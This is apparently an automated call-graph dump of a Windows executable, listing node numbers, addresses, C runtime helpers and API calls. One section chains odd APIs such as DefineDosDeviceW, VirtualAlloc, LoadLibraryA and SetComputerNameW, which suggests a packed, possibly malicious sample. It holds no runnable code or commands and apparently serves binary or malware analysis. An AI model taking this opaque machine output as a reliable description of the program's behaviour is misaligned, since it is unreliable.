__encode_pointer 6 API calls 6596->6597 6598 408fe3 6596->6598 6597->6596 6598->6217 6602 4098c8 6599->6602 6601 409911 6601->6219 6603 4098d4 __calloc_impl 6602->6603 6610 4056a8 6603->6610 6609 4098f5 __calloc_impl 6609->6601 6611 4048fc __lock 67 API calls 6610->6611 6612 4056af 6611->6612 6613 4097dd 6612->6613 6614 407b4f __decode_pointer 6 API calls 6613->6614 6615 4097f1 6614->6615 6616 407b4f __decode_pointer 6 API calls 6615->6616 6617 409801 6616->6617 6618 409884 6617->6618 6633 40bdab 6617->6633 6630 4098fe 6618->6630 6620 407ad4 __encode_pointer 6 API calls 6621 409879 6620->6621 6624 407ad4 __encode_pointer 6 API calls 6621->6624 6622 409843 6622->6618 6626 409178 __realloc_crt 73 API calls 6622->6626 6627 409859 6622->6627 6623 40981f 6623->6622 6629 40986b 6623->6629 6646 409178 6623->6646 6624->6618 6626->6627 6627->6618 6628 407ad4 __encode_pointer 6 API calls 6627->6628 6628->6629 6629->6620 6724 4056b1 6630->6724 6634 40bdb7 __calloc_impl 6633->6634 6635 40bde4 6634->6635 6636 40bdc7 6634->6636 6637 40be25 HeapSize 6635->6637 6639 4048fc __lock 67 API calls 6635->6639 6638 405b6a __calloc_impl 67 API calls 6636->6638 6642 40bddc __calloc_impl 6637->6642 6640 40bdcc 6638->6640 6643 40bdf4 ___sbh_find_block 6639->6643 6641 406ee2 __calloc_impl 6 API calls 6640->6641 6641->6642 6642->6623 6651 40be45 6643->6651 6650 409181 6646->6650 6648 4091c0 6648->6622 6649 4091a1 Sleep 6649->6650 6650->6648 6650->6649 6655 403657 6650->6655 6654 404822 LeaveCriticalSection 6651->6654 6653 40be20 6653->6637 6653->6642 6654->6653 6656 403663 __calloc_impl 6655->6656 6657 403678 6656->6657 6658 40366a 6656->6658 6660 40368b 6657->6660 6661 40367f 6657->6661 6691 403395 6658->6691 6669 4037fd 6660->6669 6689 403698 ___sbh_resize_block _realloc ___sbh_find_block 6660->6689 6662 407275 ___convertcp 67 API calls 6661->6662 6663 403672 __dosmaperr __calloc_impl 6662->6663 6663->6650 6664 403830 6665 405bc2 __calloc_impl 6 API calls 6664->6665 6668 403836 6665->6668 6666 4048fc __lock 67 API calls 6666->6689 6667 403802 HeapReAlloc 6667->6663 6667->6669 6670 405b6a __calloc_impl 67 API calls 6668->6670 6669->6664 6669->6667 6671 403854 6669->6671 6672 405bc2 __calloc_impl 6 API calls 6669->6672 6674 40384a 6669->6674 6670->6663 6671->6663 6673 405b6a __calloc_impl 67 API calls 6671->6673 6672->6669 6675 40385d GetLastError 6673->6675 6677 405b6a __calloc_impl 67 API calls 6674->6677 6675->6663 6679 4037cb 6677->6679 6678 403723 HeapAlloc 6678->6689 6679->6663 6681 4037d0 GetLastError 6679->6681 6680 403778 HeapReAlloc 6680->6689 6681->6663 6682 40510e ___sbh_alloc_block 5 API calls 6682->6689 6683 4037e3 6683->6663 6685 405b6a __calloc_impl 67 API calls 6683->6685 6684 405bc2 __calloc_impl 6 API calls 6684->6689 6687 4037f0 6685->6687 6686 4037c6 6688 405b6a __calloc_impl 67 API calls 6686->6688 6687->6663 6687->6675 6688->6679 6689->6663 6689->6664 6689->6666 6689->6678 6689->6680 6689->6682 6689->6683 6689->6684 6689->6686 6690 40495f VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6689->6690 6708 40379b 6689->6708 6690->6689 6692 403448 6691->6692 6697 4033a7 6691->6697 6693 405bc2 __calloc_impl 6 API calls 6692->6693 6694 40344e 6693->6694 6696 405b6a __calloc_impl 66 API calls 6694->6696 6695 405aef __FF_MSGBANNER 66 API calls 6695->6697 6702 403440 6696->6702 6697->6695 6699 405944 __NMSG_WRITE 66 API calls 6697->6699 6700 403404 HeapAlloc 6697->6700 6701 405690 _malloc 3 API calls 6697->6701 6697->6702 6703 403434 6697->6703 6705 405bc2 __calloc_impl 6 API calls 6697->6705 6706 403439 6697->6706 6711 403346 6697->6711 6699->6697 6700->6697 6701->6697 6702->6663 6704 405b6a __calloc_impl 66 API calls 6703->6704 6704->6706 6705->6697 6707 405b6a __calloc_impl 66 API calls 6706->6707 6707->6702 6723 404822 LeaveCriticalSection 6708->6723 6710 4037a2 6710->6689 6712 403352 __calloc_impl 6711->6712 6713 403383 __calloc_impl 6712->6713 6714 4048fc __lock 67 API calls 6712->6714 6713->6697 6715 403368 6714->6715 6716 40510e ___sbh_alloc_block 5 API calls 6715->6716 6717 403373 6716->6717 6719 40338c 6717->6719 6722 404822 LeaveCriticalSection 6719->6722 6721 403393 6721->6713 6722->6721 6723->6710 6727 404822 LeaveCriticalSection 6724->6727 6726 4056b8 6726->6609 6727->6726 6729 402af6 SetLastError 6728->6729 6730 402b01 6729->6730 6731 402b0a 6729->6731 6730->6729 6730->6731 6732 402b16 DefineDosDeviceW 6731->6732 6742 402b35 6731->6742 6735 403395 _malloc 67 API calls 6732->6735 6733 402bba VirtualAlloc 6737 402bf4 GetTickCount 6733->6737 6734 402b5c OpenJobObjectW InterlockedIncrement 6763 403558 6734->6763 6736 402b2b 6735->6736 6739 403657 _realloc 72 API calls 6736->6739 6737->6737 6740 402bfb 6737->6740 6739->6742 6743 402c59 6740->6743 6746 402c32 InterlockedExchange LoadLibraryA ReadConsoleInputA 6740->6746 6742->6733 6742->6734 6747 402c77 LCMapStringW InterlockedExchange OpenEventW 6743->6747 6748 402ca7 6743->6748 6745 402b8a 6770 403194 6745->6770 6746->6740 6747->6743 6792 4029b0 6748->6792 6751 402cac 6754 402cc8 GetCurrentProcess GetCharWidth32A 6751->6754 6756 402ce5 6751->6756 6752 402ba0 6777 403592 6752->6777 6754->6751 6755 402bb7 6755->6733 6757 402cf0 GetLastError 6756->6757 6758 402d17 6756->6758 6757->6756 6759 402d3c GetFileAttributesA GetShortPathNameA GlobalCompact GetEnvironmentStrings SetComputerNameW 6758->6759 6760 402d71 InterlockedExchange 6758->6760 6761 402d83 LoadLibraryA 6758->6761 6759->6758 6760->6758 6762 402de6 6761->6762 6762->6223 6797 405ea0 6763->6797 6766 403587 6767 40356e 6766->6767 7103 405ecb 6767->7103 6771 4031ac __ctrlfp 6770->6771 6772 4031dc 6771->6772 6775 40320a __set_exp __copysign __decomp 6771->6775 6776 4031f4 __set_exp __ctrlfp 6771->6776 7106 4044af 6772->7106 6775->6776 7113 404510 6775->7113 6776->6752 6778 40359e __calloc_impl 6777->6778 6779 4035c9 __stbuf 6778->6779 6780 4035ac 6778->6780 7146 406000 6779->7146 6781 405b6a __calloc_impl 67 API calls 6780->6781 6782 4035b1 6781->6782 6784 406ee2 __calloc_impl 6 API calls 6782->6784 6786 4035c1 __calloc_impl 6784->6786 6785 4035db __stbuf 7151 40609d 6785->7151 6786->6755 6788 4035ed __stbuf 7158 406139 6788->7158 6794 4029bd __write_nolock 6792->6794 6793 402ac5 6793->6751 6794->6793 6795 4029fe 12 API calls 6794->6795 7329 402780 6794->7329 6795->6794 6798 405eb9 6797->6798 6801 405c71 6798->6801 6813 405bea 6801->6813 6804 405c98 6805 405b6a __calloc_impl 67 API calls 6804->6805 6806 405c9d 6805->6806 6807 406ee2 __calloc_impl 6 API calls 6806->6807 6812 402b80 6807->6812 6809 405cd5 6810 405d1a 6809->6810 6821 40a976 6809->6821 6811 405b6a __calloc_impl 67 API calls 6810->6811 6810->6812 6811->6812 6812->6766 6814 405bfd 6813->6814 6820 405c4a 6813->6820 6828 407d9b 6814->6828 6817 405c2a 6817->6820 6848 40a194 6817->6848 6820->6804 6820->6809 6822 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 6821->6822 6823 40a98a 6822->6823 6827 40a997 6823->6827 7036 40b0ba 6823->7036 6827->6809 6829 407d22 __getptd_noexit 67 API calls 6828->6829 6830 407da3 6829->6830 6831 40563c __amsg_exit 67 API calls 6830->6831 6832 405c02 6830->6832 6831->6832 6832->6817 6833 40a900 6832->6833 6834 40a90c __calloc_impl 6833->6834 6835 407d9b __getptd 67 API calls 6834->6835 6836 40a911 6835->6836 6837 40a93f 6836->6837 6838 40a923 6836->6838 6839 4048fc __lock 67 API calls 6837->6839 6840 407d9b __getptd 67 API calls 6838->6840 6841 40a946 6839->6841 6845 40a928 6840->6845 6864 40a8c2 6841->6864 6846 40563c __amsg_exit 67 API calls 6845->6846 6847 40a936 __calloc_impl 6845->6847 6846->6847 6847->6817 6849 40a1a0 __calloc_impl 6848->6849 6850 407d9b __getptd 67 API calls 6849->6850 6851 40a1a5 6850->6851 6852 4048fc __lock 67 API calls 6851->6852 6861 40a1b7 6851->6861 6853 40a1d5 6852->6853 6854 40a21e 6853->6854 6855 40a206 InterlockedIncrement 6853->6855 6856 40a1ec InterlockedDecrement 6853->6856 7032 40a22f 6854->7032 6855->6854 6856->6855 6860 40a1f7 6856->6860 6858 40563c __amsg_exit 67 API calls 6859 40a1c5 __calloc_impl 6858->6859 6859->6820 6860->6855 6862 407275 ___convertcp 67 API calls 6860->6862 6861->6858 6861->6859 6863 40a205 6862->6863 6863->6855 6865 40a8c6 6864->6865 6866 40a8f8 6864->6866 6865->6866 6867 40a79a ___addlocaleref 8 API calls 6865->6867 6872 40a96a 6866->6872 6868 40a8d9 6867->6868 6868->6866 6875 40a829 6868->6875 7031 404822 LeaveCriticalSection 6872->7031 6874 40a971 6874->6845 6876 40a83a InterlockedDecrement 6875->6876 6877 40a8bd 6875->6877 6878 40a852 6876->6878 6879 40a84f InterlockedDecrement 6876->6879 6877->6866 6889 40a651 6877->6889 6880 40a85c InterlockedDecrement 6878->6880 6881 40a85f 6878->6881 6879->6878 6880->6881 6882 40a869 InterlockedDecrement 6881->6882 6883 40a86c 6881->6883 6882->6883 6884 40a876 InterlockedDecrement 6883->6884 6886 40a879 6883->6886 6884->6886 6885 40a892 InterlockedDecrement 6885->6886 6886->6885 6887 40a8a2 InterlockedDecrement 6886->6887 6888 40a8ad InterlockedDecrement 6886->6888 6887->6886 6888->6877 6890 40a6d5 6889->6890 6892 40a668 6889->6892 6891 407275 ___convertcp 67 API calls 6890->6891 6893 40a722 6890->6893 6894 40a6f6 6891->6894 6892->6890 6900 40a69c 6892->6900 6903 407275 ___convertcp 67 API calls 6892->6903 6898 40a749 6893->6898 6943 40c56b 6893->6943 6896 407275 ___convertcp 67 API calls 6894->6896 6899 40a709 6896->6899 6902 40a78e 6898->6902 6912 407275 67 API calls ___convertcp 6898->6912 6905 407275 ___convertcp 67 API calls 6899->6905 6906 407275 ___convertcp 67 API calls 6900->6906 6918 40a6bd 6900->6918 6901 407275 ___convertcp 67 API calls 6907 40a6ca 6901->6907 6908 407275 ___convertcp 67 API calls 6902->6908 6909 40a691 6903->6909 6904 407275 ___convertcp 67 API calls 6904->6898 6910 40a717 6905->6910 6911 40a6b2 6906->6911 6913 407275 ___convertcp 67 API calls 6907->6913 6914 40a794 6908->6914 6919 40c745 6909->6919 6916 407275 ___convertcp 67 API calls 6910->6916 6935 40c700 6911->6935 6912->6898 6913->6890 6914->6866 6916->6893 6918->6901 6920 40c752 6919->6920 6934 40c7cf 6919->6934 6921 40c763 6920->6921 6923 407275 ___convertcp 67 API calls 6920->6923 6922 40c775 6921->6922 6924 407275 ___convertcp 67 API calls 6921->6924 6925 40c787 6922->6925 6926 407275 ___convertcp 67 API calls 6922->6926 6923->6921 6924->6922 6927 40c799 6925->6927 6928 407275 ___convertcp 67 API calls 6925->6928 6926->6925 6929 40c7ab 6927->6929 6930 407275 ___convertcp 67 API calls 6927->6930 6928->6927 6931 407275 ___convertcp 67 API calls 6929->6931 6932 40c7bd 6929->6932 6930->6929 6931->6932 6933 407275 ___convertcp 67 API calls 6932->6933 6932->6934 6933->6934 6934->6900 6936 40c741 6935->6936 6937 40c70d 6935->6937 6936->6918 6938 40c71d 6937->6938 6940 407275 ___convertcp 67 API calls 6937->6940 6939 40c72f 6938->6939 6941 407275 ___convertcp 67 API calls 6938->6941 6939->6936 6942 407275 ___convertcp 67 API calls 6939->6942 6940->6938 6941->6939 6942->6936 6944 40c57c 6943->6944 6945 40a742 6943->6945 6946 407275 ___convertcp 67 API calls 6944->6946 6945->6904 6947 40c584 6946->6947 6948 407275 ___convertcp 67 API calls 6947->6948 6949 40c58c 6948->6949 6950 407275 ___convertcp 67 API calls 6949->6950 6951 40c594 6950->6951 6952 407275 ___convertcp 67 API calls 6951->6952 6953 40c59c 6952->6953 6954 407275 ___convertcp 67 API calls 6953->6954 6955 40c5a4 6954->6955 6956 407275 ___convertcp 67 API calls 6955->6956 6957 40c5ac 6956->6957 6958 407275 ___convertcp 67 API calls 6957->6958 6959 40c5b3 6958->6959 6960 407275 ___convertcp 67 API calls 6959->6960 6961 40c5bb 6960->6961 6962 407275 ___convertcp 67 API calls 6961->6962 6963 40c5c3 6962->6963 6964 407275 ___convertcp 67 API calls 6963->6964 6965 40c5cb 6964->6965 6966 407275 ___convertcp 67 API calls 6965->6966 6967 40c5d3 6966->6967 6968 407275 ___convertcp 67 API calls 6967->6968 6969 40c5db 6968->6969 6970 407275 ___convertcp 67 API calls 6969->6970 6971 40c5e3 6970->6971 6972 407275 ___convertcp 67 API calls 6971->6972 6973 40c5eb 6972->6973 6974 407275 ___convertcp 67 API calls 6973->6974 6975 40c5f3 6974->6975 6976 407275 ___convertcp 67 API calls 6975->6976 6977 40c5fb 6976->6977 6978 407275 ___convertcp 67 API calls 6977->6978 6979 40c606 6978->6979 6980 407275 ___convertcp 67 API calls 6979->6980 6981 40c60e 6980->6981 6982 407275 ___convertcp 67 API calls 6981->6982 6983 40c616 6982->6983 6984 407275 ___convertcp 67 API calls 6983->6984 6985 40c61e 6984->6985 6986 407275 ___convertcp 67 API calls 6985->6986 6987 40c626 6986->6987 6988 407275 ___convertcp 67 API calls 6987->6988 6989 40c62e 6988->6989 6990 407275 ___convertcp 67 API calls 6989->6990 6991 40c636 6990->6991 6992 407275 ___convertcp 67 API calls 6991->6992 6993 40c63e 6992->6993 6994 407275 ___convertcp 67 API calls 6993->6994 6995 40c646 6994->6995 6996 407275 ___convertcp 67 API calls 6995->6996 6997 40c64e 6996->6997 6998 407275 ___convertcp 67 API calls 6997->6998 6999 40c656 6998->6999 7000 407275 ___convertcp 67 API calls 6999->7000 7001 40c65e 7000->7001 7002 407275 ___convertcp 67 API calls 7001->7002 7003 40c666 7002->7003 7004 407275 ___convertcp 67 API calls 7003->7004 7005 40c66e 7004->7005 7006 407275 ___convertcp 67 API calls 7005->7006 7007 40c676 7006->7007 7008 407275 ___convertcp 67 API calls 7007->7008 7009 40c67e 7008->7009 7010 407275 ___convertcp 67 API calls 7009->7010 7011 40c68c 7010->7011 7012 407275 ___convertcp 67 API calls 7011->7012 7013 40c697 7012->7013 7014 407275 ___convertcp 67 API calls 7013->7014 7015 40c6a2 7014->7015 7016 407275 ___convertcp 67 API calls 7015->7016 7017 40c6ad 7016->7017 7018 407275 ___convertcp 67 API calls 7017->7018 7019 40c6b8 7018->7019 7020 407275 ___convertcp 67 API calls 7019->7020 7021 40c6c3 7020->7021 7022 407275 ___convertcp 67 API calls 7021->7022 7023 40c6ce 7022->7023 7024 407275 ___convertcp 67 API calls 7023->7024 7025 40c6d9 7024->7025 7026 407275 ___convertcp 67 API calls 7025->7026 7027 40c6e4 7026->7027 7028 407275 ___convertcp 67 API calls 7027->7028 7029 40c6ef 7028->7029 7030 407275 ___convertcp 67 API calls 7029->7030 7030->6945 7031->6874 7035 404822 LeaveCriticalSection 7032->7035 7034 40a236 7034->6861 7035->7034 7037 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7036->7037 7038 40a9bf 7037->7038 7039 40c529 7038->7039 7040 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7039->7040 7041 40c53c 7040->7041 7044 40c36f 7041->7044 7045 40c390 GetStringTypeW 7044->7045 7046 40c3bb 7044->7046 7048 40c3b0 GetLastError 7045->7048 7049 40c3a8 7045->7049 7047 40c4a2 7046->7047 7046->7049 7072 40f4cc GetLocaleInfoA 7047->7072 7048->7046 7050 40c3f4 MultiByteToWideChar 7049->7050 7067 40c49c 7049->7067 7056 40c421 7050->7056 7050->7067 7052 40841c __atodbl_l 5 API calls 7054 40c527 7052->7054 7054->6827 7055 40c4f3 GetStringTypeA 7060 40c50e 7055->7060 7055->7067 7057 403395 _malloc 67 API calls 7056->7057 7061 40c436 _memset ___convertcp 7056->7061 7057->7061 7059 40c46f MultiByteToWideChar 7063 40c485 GetStringTypeW 7059->7063 7064 40c496 7059->7064 7065 407275 ___convertcp 67 API calls 7060->7065 7061->7059 7061->7067 7063->7064 7068 40bf65 7064->7068 7065->7067 7067->7052 7069 40bf71 7068->7069 7070 40bf82 7068->7070 7069->7070 7071 407275 ___convertcp 67 API calls 7069->7071 7070->7067 7071->7070 7073 40f4ff 7072->7073 7075 40f4fa 7072->7075 7074 403558 ___ansicp 90 API calls 7073->7074 7074->7075 7076 40841c __atodbl_l 5 API calls 7075->7076 7077 40c4c6 7076->7077 7077->7055 7077->7067 7078 40f515 7077->7078 7079 40f5df 7078->7079 7080 40f555 GetCPInfo 7078->7080 7084 40841c __atodbl_l 5 API calls 7079->7084 7081 40f5ca MultiByteToWideChar 7080->7081 7082 40f56c 7080->7082 7081->7079 7087 40f585 _strlen 7081->7087 7082->7081 7083 40f572 GetCPInfo 7082->7083 7083->7081 7086 40f57f 7083->7086 7085 40c4e7 7084->7085 7085->7055 7085->7067 7086->7081 7086->7087 7088 403395 _malloc 67 API calls 7087->7088 7090 40f5b7 _memset ___convertcp 7087->7090 7088->7090 7089 40f614 MultiByteToWideChar 7091 40f64b 7089->7091 7092 40f62c 7089->7092 7090->7079 7090->7089 7093 40bf65 ___convertcp 67 API calls 7091->7093 7094 40f650 7092->7094 7095 40f633 WideCharToMultiByte 7092->7095 7093->7079 7096 40f65b WideCharToMultiByte 7094->7096 7097 40f66f 7094->7097 7095->7091 7096->7091 7096->7097 7098 40912c __calloc_crt 67 API calls 7097->7098 7099 40f677 7098->7099 7099->7091 7100 40f680 WideCharToMultiByte 7099->7100 7100->7091 7101 40f692 7100->7101 7102 407275 ___convertcp 67 API calls 7101->7102 7102->7091 7104 405c71 strtoxl 91 API calls 7103->7104 7105 403582 7104->7105 7105->6745 7107 4044f1 7106->7107 7108 4044c8 7106->7108 7109 405b6a __calloc_impl 67 API calls 7107->7109 7124 40440f 7108->7124 7112 4044f6 __ctrlfp 7109->7112 7111 4044ec 7111->6776 7112->6776 7114 404546 __handle_exc 7113->7114 7116 40457a __except2 7114->7116 7139 4041a9 7114->7139 7117 4045bd 7116->7117 7118 404595 7116->7118 7119 4043ae __umatherr 67 API calls 7117->7119 7120 40440f __umatherr 67 API calls 7118->7120 7121 4045b8 __ctrlfp 7119->7121 7120->7121 7122 40841c __atodbl_l 5 API calls 7121->7122 7123 4045e1 7122->7123 7123->6776 7125 404419 7124->7125 7126 404492 __ctrlfp 7125->7126 7128 404434 __ctrlfp __umatherr 7125->7128 7127 4043ae __umatherr 67 API calls 7126->7127 7129 4044a7 7127->7129 7130 404482 7128->7130 7132 4043ae 7128->7132 7129->7111 7130->7111 7133 4043b9 7132->7133 7134 4043ce 7132->7134 7136 4043d3 7133->7136 7137 405b6a __calloc_impl 67 API calls 7133->7137 7135 405b6a __calloc_impl 67 API calls 7134->7135 7135->7136 7136->7130 7138 4043c6 7137->7138 7138->7130 7142 403ecd 7139->7142 7143 403ef4 __raise_exc_ex 7142->7143 7144 4040e7 RaiseException 7143->7144 7145 404100 7144->7145 7145->7116 7147 406023 EnterCriticalSection 7146->7147 7148 40600d 7146->7148 7147->6785 7149 4048fc __lock 67 API calls 7148->7149 7150 406016 7149->7150 7150->6785 7166 40ad9b 7151->7166 7155 4060ff 7155->6788 7156 4060b2 __stbuf 7156->7155 7157 4090e7 __malloc_crt 67 API calls 7156->7157 7157->7155 7159 406144 7158->7159 7160 403616 7158->7160 7159->7160 7181 40aba4 7159->7181 7162 40362e 7160->7162 7163 403633 __stbuf 7162->7163 7323 40606e 7163->7323 7165 40363e 7165->6786 7167 4060ac 7166->7167 7168 40adaa 7166->7168 7172 40ad37 7167->7172 7169 405b6a __calloc_impl 67 API calls 7168->7169 7170 40adaf 7169->7170 7171 406ee2 __calloc_impl 6 API calls 7170->7171 7171->7167 7173 40ad44 7172->7173 7174 40ad53 7172->7174 7175 405b6a __calloc_impl 67 API calls 7173->7175 7176 40ad77 7174->7176 7177 405b6a __calloc_impl 67 API calls 7174->7177 7178 40ad49 7175->7178 7176->7156 7179 40ad67 7177->7179 7178->7156 7180 406ee2 __calloc_impl 6 API calls 7179->7180 7180->7176 7182 40abbd 7181->7182 7186 40abdf 7181->7186 7183 40ad9b __fileno 67 API calls 7182->7183 7182->7186 7184 40abd8 7183->7184 7187 40d126 7184->7187 7186->7160 7188 40d132 __calloc_impl 7187->7188 7189 40d155 7188->7189 7190 40d13a 7188->7190 7192 40d163 7189->7192 7195 40d1a4 7189->7195 7212 405b7d 7190->7212 7194 405b7d __dosmaperr 67 API calls 7192->7194 7197 40d168 7194->7197 7215 40fb88 7195->7215 7196 405b6a __calloc_impl 67 API calls 7207 40d147 __calloc_impl 7196->7207 7199 405b6a __calloc_impl 67 API calls 7197->7199 7201 40d16f 7199->7201 7200 40d1aa 7202 40d1b7 7200->7202 7203 40d1cd 7200->7203 7204 406ee2 __calloc_impl 6 API calls 7201->7204 7225 40c9f3 7202->7225 7206 405b6a __calloc_impl 67 API calls 7203->7206 7204->7207 7209 40d1d2 7206->7209 7207->7186 7208 40d1c5 7284 40d1f8 7208->7284 7210 405b7d __dosmaperr 67 API calls 7209->7210 7210->7208 7213 407d22 __getptd_noexit 67 API calls 7212->7213 7214 405b82 7213->7214 7214->7196 7216 40fb94 __calloc_impl 7215->7216 7217 40fbef 7216->7217 7220 4048fc __lock 67 API calls 7216->7220 7218 40fc11 __calloc_impl 7217->7218 7219 40fbf4 EnterCriticalSection 7217->7219 7218->7200 7219->7218 7221 40fbc0 7220->7221 7222 40fbd7 7221->7222 7224 409087 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7221->7224 7287 40fc1f 7222->7287 7224->7222 7226 40ca02 __write_nolock 7225->7226 7227 40ca34 7226->7227 7228 40ca5b 7226->7228 7258 40ca29 7226->7258 7230 405b7d __dosmaperr 67 API calls 7227->7230 7231 40cac3 7228->7231 7232 40ca9d 7228->7232 7229 40841c __atodbl_l 5 API calls 7233 40d124 7229->7233 7234 40ca39 7230->7234 7236 40cad7 7231->7236 7291 40d2e3 7231->7291 7235 405b7d __dosmaperr 67 API calls 7232->7235 7233->7208 7237 405b6a __calloc_impl 67 API calls 7234->7237 7238 40caa2 7235->7238 7241 40ad37 __write_nolock 67 API calls 7236->7241 7240 40ca40 7237->7240 7243 405b6a __calloc_impl 67 API calls 7238->7243 7244 406ee2 __calloc_impl 6 API calls 7240->7244 7242 40cae2 7241->7242 7245 40cd88 7242->7245 7250 407d9b __getptd 67 API calls 7242->7250 7246 40caab 7243->7246 7244->7258 7248 40d057 WriteFile 7245->7248 7249 40cd98 7245->7249 7247 406ee2 __calloc_impl 6 API calls 7246->7247 7247->7258 7253 40cd6a 7248->7253 7254 40d08a GetLastError 7248->7254 7251 40ce76 7249->7251 7274 40cdac 7249->7274 7252 40cafd GetConsoleMode 7250->7252 7273 40cf56 7251->7273 7276 40ce85 7251->7276 7252->7245 7256 40cb28 7252->7256 7255 40d0d5 7253->7255 7253->7258 7260 40d0a8 7253->7260 7254->7253 7255->7258 7259 405b6a __calloc_impl 67 API calls 7255->7259 7256->7245 7257 40cb3a GetConsoleCP 7256->7257 7257->7253 7282 40cb5d 7257->7282 7258->7229 7262 40d0f8 7259->7262 7264 40d0b3 7260->7264 7265 40d0c7 7260->7265 7261 40ce1a WriteFile 7261->7254 7261->7274 7270 405b7d __dosmaperr 67 API calls 7262->7270 7263 40cfbc WideCharToMultiByte 7263->7254 7267 40cff3 WriteFile 7263->7267 7266 405b6a __calloc_impl 67 API calls 7264->7266 7304 405b90 7265->7304 7271 40d0b8 7266->7271 7272 40d02a GetLastError 7267->7272 7267->7273 7268 40cefa WriteFile 7268->7254 7268->7276 7270->7258 7275 405b7d __dosmaperr 67 API calls 7271->7275 7272->7273 7273->7253 7273->7255 7273->7263 7273->7267 7274->7253 7274->7255 7274->7261 7275->7258 7276->7253 7276->7255 7276->7268 7278 40f863 11 API calls __putwch_nolock 7278->7282 7279 40cc09 WideCharToMultiByte 7279->7253 7281 40cc3a WriteFile 7279->7281 7280 40fa3f 79 API calls __fassign 7280->7282 7281->7254 7281->7282 7282->7253 7282->7254 7282->7278 7282->7279 7282->7280 7283 40cc8e WriteFile 7282->7283 7301 40b0f2 7282->7301 7283->7254 7283->7282 7322 40fc28 LeaveCriticalSection 7284->7322 7286 40d200 7286->7207 7290 404822 LeaveCriticalSection 7287->7290 7289 40fc26 7289->7217 7290->7289 7309 40fb11 7291->7309 7293 40d301 7294 40d309 7293->7294 7295 40d31a SetFilePointer 7293->7295 7296 405b6a __calloc_impl 67 API calls 7294->7296 7297 40d332 GetLastError 7295->7297 7299 40d30e 7295->7299 7296->7299 7298 40d33c 7297->7298 7297->7299 7300 405b90 __dosmaperr 67 API calls 7298->7300 7299->7236 7300->7299 7302 40b0ba __isleadbyte_l 77 API calls 7301->7302 7303 40b101 7302->7303 7303->7282 7305 405b7d __dosmaperr 67 API calls 7304->7305 7306 405b9b __dosmaperr 7305->7306 7307 405b6a __calloc_impl 67 API calls 7306->7307 7308 405bae 7307->7308 7308->7258 7310 40fb36 7309->7310 7311 40fb1e 7309->7311 7313 405b7d __dosmaperr 67 API calls 7310->7313 7315 40fb7b 7310->7315 7312 405b7d __dosmaperr 67 API calls 7311->7312 7314 40fb23 7312->7314 7316 40fb64 7313->7316 7317 405b6a __calloc_impl 67 API calls 7314->7317 7315->7293 7318 405b6a __calloc_impl 67 API calls 7316->7318 7319 40fb2b 7317->7319 7320 40fb6b 7318->7320 7319->7293 7321 406ee2 __calloc_impl 6 API calls 7320->7321 7321->7315 7322->7286 7324 406091 LeaveCriticalSection 7323->7324 7325 40607e 7323->7325 7324->7165 7328 404822 LeaveCriticalSection 7325->7328 7327 40608e 7327->7165 7328->7327 7333 40278d _memset __write_nolock 7329->7333 7330 40281b SetFileAttributesA 7330->7333 7331 40285e GetCommConfig 7331->7333 7332 40287d 8 API calls 7332->7333 7333->7330 7333->7331 7333->7332 7334 402950 SetVolumeMountPointW GlobalMemoryStatus 7333->7334 7335 40299b 7333->7335 7336 40290b CommConfigDialogW ReadConsoleInputA GetVersionExW InterlockedIncrement 7333->7336 7334->7333 7335->6794 7336->7333 7338 40578c __calloc_impl 7337->7338 7339 4048fc __lock 67 API calls 7338->7339 7340 405793 7339->7340 7341 40584c __initterm 7340->7341 7343 407b4f __decode_pointer 6 API calls 7340->7343 7354 405897 7341->7354 7345 4057ca 7343->7345 7345->7341 7348 407b4f __decode_pointer 6 API calls 7345->7348 7346 405894 __calloc_impl 7346->6228 7352 4057df 7348->7352 7349 40588b 7350 405690 _malloc 3 API calls 7349->7350 7350->7346 7351 407b46 6 API calls __init_pointers 7351->7352 7352->7341 7352->7351 7353 407b4f 6 API calls __decode_pointer 7352->7353 7353->7352 7355 405878 7354->7355 7356 40589d 7354->7356 7355->7346 7358 404822 LeaveCriticalSection 7355->7358 7359 404822 LeaveCriticalSection 7356->7359 7358->7349 7359->7355 7623 4047cb 7624 4047db 7623->7624 7625 4047e7 DeleteCriticalSection 7624->7625 7626 4047ff 7624->7626 7627 407275 ___convertcp 67 API calls 7625->7627 7628 404811 DeleteCriticalSection 7626->7628 7629 40481f 7626->7629 7627->7624 7628->7626 7361 405450 7362 405489 7361->7362 7363 40547c 7361->7363 7364 40841c __atodbl_l 5 API calls 7362->7364 7365 40841c __atodbl_l 5 API calls 7363->7365 7371 405499 __except_handler4 __IsNonwritableInCurrentImage 7364->7371 7365->7362 7366 40551c 7367 4054f2 __except_handler4 7367->7366 7368 40550c 7367->7368 7370 40841c __atodbl_l 5 API calls 7367->7370 7369 40841c __atodbl_l 5 API calls 7368->7369 7369->7366 7370->7368 7371->7366 7371->7367 7377 40965a RtlUnwind 7371->7377 7373 40556b __except_handler4 7374 40559f 7373->7374 7375 40841c __atodbl_l 5 API calls 7373->7375 7376 40841c __atodbl_l 5 API calls 7374->7376 7375->7374 7376->7367 7377->7373 7666 409897 7667 40912c __calloc_crt 67 API calls 7666->7667 7668 4098a3 7667->7668 7669 407ad4 __encode_pointer 6 API calls 7668->7669 7670 4098ab 7669->7670 7543 403a18 7546 408071 7543->7546 7545 403a1d 7545->7545 7547 4080a3 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7546->7547 7548 408096 7546->7548 7549 40809a 7547->7549 7548->7547 7548->7549 7549->7545 7630 4039d9 7631 4039e8 7630->7631 7632 4039ee 7630->7632 7633 4058c2 _abort 67 API calls 7631->7633 7636 4058e7 7632->7636 7633->7632 7635 4039f3 __calloc_impl 7637 405780 _doexit 67 API calls 7636->7637 7638 4058f2 7637->7638 7638->7635 7378 40475d 7379 404767 __cfltcvt_init 7378->7379 7384 40904f GetModuleHandleA 7379->7384 7382 40477c 7385 40905e GetProcAddress 7384->7385 7386 40476c 7384->7386 7385->7386 7386->7382 7387 408fe6 7386->7387 7392 40bae8 7387->7392 7389 408ffb 7390 406dba __invoke_watson 10 API calls 7389->7390 7391 40900c 7389->7391 7390->7391 7391->7382 7393 40bb03 __control87 7392->7393 7396 40bb2c __control87 7392->7396 7394 405b6a __calloc_impl 67 API calls 7393->7394 7395 40bb1d 7394->7395 7397 406ee2 __calloc_impl 6 API calls 7395->7397 7396->7389 7397->7396 7671 40b09d 7674 40af31 7671->7674 